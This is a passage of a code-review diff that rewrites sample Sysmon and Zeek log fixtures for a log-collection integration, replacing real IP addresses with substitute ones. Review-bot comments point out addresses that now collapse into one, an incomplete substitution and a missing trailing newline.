Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
 "provider": "Microsoft-Windows-Sysmon",
 "kind": "event",
 "created": "2019-07-18T03:49:52.105Z",
diff --git a/packages/windows/manifest.yml
index 8d8c3c9c742..4454c18715d 100644
--- a/packages/windows/manifest.yml
+++ b/packages/windows/manifest.yml
@@ -1,6 +1,6 @@
 name: windows
 title: Windows
-version: 1.5.0
+version: 1.5.1
 description: Collect logs and metrics from Windows OS and services with Elastic Agent.
 type: integration
 categories:
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/conn.log
index c0c61bc98bf..74d3721e8f0 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/conn.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/conn.log
@@ -1,11 +1,11 @@
 {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38341,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
-{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]}
-{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"46.101.87.151","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
-{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
-{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
-{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"89.160.20.156","id.orig_p":38341,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]}
+{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.168.2.205","id.orig_p":3,"id.resp_h":"89.160.20.156","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]}
+{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0}
+{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
+{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267}
 {"ts":1617062390.563187,"uid":"CezEGe4jeLNkayV976","id.orig_h":"10.156.0.2","id.orig_p":38948,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.02680206298828125,"orig_bytes":0,"resp_bytes":241,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":269}
 {"ts":1617062390.563442,"uid":"CKSr3w18mmW6t7bXC4","id.orig_h":"10.156.0.2","id.orig_p":40080,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.025056123733520509,"orig_bytes":0,"resp_bytes":276,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":304}
 {"ts":1617062390.667048,"uid":"CGUiHy4kLIF2ml95eg","id.orig_h":"10.156.0.2","id.orig_p":41407,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.003319978713989258,"orig_bytes":0,"resp_bytes":133,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":161}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/dns.log
index c158d3fac18..01a26e3067a 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/dns.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/dns.log
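Review bot: The rewritten record with uid CAcJw21BbVedgFnYH5 now has `id.orig_h` and `id.resp_h` both set to 89.160.20.156, so the sample describes a host talking to itself, which the original (4.4.2.2 to 8.8.8.8) did not; giving the originator a different address from the supported set would keep the record meaningful. The same collapse appears in the Port_Scan notice of the notice.log hunk (src equals dst), and across the conn, dns, files, http, irc and intel hunks every external peer becomes the single address 89.160.20.156, so any dashboard or test that relies on distinct remote hosts no longer exercises that. The record Cc6NJ3GRlfjE44I3h previously used 192.0.2.205 and 198.51.100.249, which are RFC 5737 documentation addresses and already safe for sample data; replacing 192.0.2.205 with the private 192.168.2.205 changes its meaning while `local_orig` stays false, so if the supported set admits TEST-NET ranges the original values were the better choice.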
@@ -1,9 +1,9 @@
-{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","35.199.178.4"],"TTLs":[119.0,119.0,59.0],"rejected":false}
+{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","89.160.20.156"],"TTLs":[119.0,119.0,59.0],"rejected":false}
 {"ts":1567095830.680046,"uid":"C19a1k4lTv46YMbeOk","id.orig_h":"fe80::4ef:15cf:769f:ff21","id.orig_p":5353,"id.resp_h":"ff02::fb","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","qclass":1,"qclass_name":"C_INTERNET","qtype":12,"qtype_name":"PTR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false}
 {"ts":1567095830.734329,"uid":"CdiVAw7jJw6gsX5H","id.orig_h":"192.168.86.237","id.orig_p":5353,"id.resp_h":"224.0.0.251","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","rcode":0,"rcode_name":"NOERROR","AA":true,"TC":false,"RD":false,"RA":false,"Z":0,"answers":["bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local"],"TTLs":[120.0],"rejected":false}
 {"ts":1617105597.020685,"uid":"C7NcBd1QRK1mrqmaQe","id.orig_h":"10.156.0.2","id.orig_p":40091,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58530,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net"],"TTLs":[8.0,13.0],"rejected":false}
-{"ts":1617105597.020637,"uid":"CXzjOC13LkKzr4a80e","id.orig_h":"10.156.0.2","id.orig_p":38190,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":55540,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[293.0,28.0,8.0],"rejected":false}
+{"ts":1617105597.020637,"uid":"CXzjOC13LkKzr4a80e","id.orig_h":"10.156.0.2","id.orig_p":38190,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":55540,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[293.0,28.0,8.0],"rejected":false}
 {"ts":1617105597.390017,"uid":"CkQ7DU1qCEGKL5xgg6","id.orig_h":"10.156.0.2","id.orig_p":42609,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":23824,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false}
-{"ts":1617105597.389796,"uid":"CfFSjicQIGB8hU7L6","id.orig_h":"10.156.0.2","id.orig_p":52269,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":7284,"query":"portal.swiftcrypto.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["46.101.87.151"],"TTLs":[119.0],"rejected":false}
+{"ts":1617105597.389796,"uid":"CfFSjicQIGB8hU7L6","id.orig_h":"10.156.0.2","id.orig_p":52269,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":7284,"query":"portal.swiftcrypto.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["89.160.20.156"],"TTLs":[119.0],"rejected":false}
 {"ts":1617105597.761449,"uid":"C86PHA3q1KAtU7gAkb","id.orig_h":"10.156.0.2","id.orig_p":41064,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":46754,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.akadns.net"],"TTLs":[250.0,250.0,250.0],"rejected":false}
-{"ts":1617105597.761544,"uid":"Cna5vz1pk7Z32m8HZ6","id.orig_h":"10.156.0.2","id.orig_p":33681,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":53055,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","20.190.159.132","40.126.31.143","20.190.159.134","40.126.31.1","20.190.159.136","40.126.31.135","40.126.31.6","20.190.159.138"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false}
+{"ts":1617105597.761544,"uid":"Cna5vz1pk7Z32m8HZ6","id.orig_h":"10.156.0.2","id.orig_p":33681,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":53055,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","89.160.20.156","40.126.31.143","89.160.20.156","40.126.31.1","89.160.20.156","40.126.31.135","40.126.31.6","89.160.20.156"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false}
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/files.log
index 5e431e276c8..950362180ca 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/files.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/files.log
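Review bot: The replacement in the last record (uid Cna5vz1pk7Z32m8HZ6) is only partial: the four 20.190.159.x answers became 89.160.20.156, but 40.126.31.143, 40.126.31.1, 40.126.31.135 and 40.126.31.6 are untouched and look like the same kind of real public address this change is meant to remove (the supported list is not visible here, so confirm whether they are on it). The resulting `answers` array also repeats 89.160.20.156 four times with different TTLs, an unusual shape for a single DNS response; spreading the substitutions over several addresses from the supported set would keep the answer set distinct and the record plausible.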
@@ -1,8 +1,8 @@
-{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["35.199.178.4"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"}
-{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"}
-{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"}
-{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
-{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
-{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"}
+{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"}
+{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"}
+{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
 {"ts":1617069792.519193,"fuid":"FSMkdM3YUSoEVpLZN4","tx_hosts":["169.254.169.254"],"rx_hosts":["10.156.0.2"],"conn_uids":["CgbPEj2jf5Ca7Lw0x2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5"],"mime_type":"text/html","duration":0.00005316734313964844,"local_orig":false,"is_orig":false,"seen_bytes":1609,"total_bytes":1609,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"1ab1d3a926a99ccfc25acccc5b4289b4","sha1":"1895628784b47ad8da112c699a1b21f5b49c2b80"}
-{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
\ No newline at end of file
+{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
\ No newline at end of file
diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/http.log
index d31ad75428a..8fd8bce9c52 100644
--- a/packages/zeek/_dev/deploy/docker/sample_logs/http.log
+++ b/packages/zeek/_dev/deploy/docker/sample_logs/http.log
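Review bot: The last record (fuid F1msmE2xRFsdvL2iI) still carries `\ No newline at end of file` on the new side. If these sample logs are tailed by the agent during the system test, a final line without a terminator is typically held back rather than emitted as an event, so that record may never be exercised; adding the trailing newline while the line is being rewritten anyway would close that gap. The notice.log hunk shows the same marker, but its end is outside this view.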
@@ -1,7 +1,7 @@
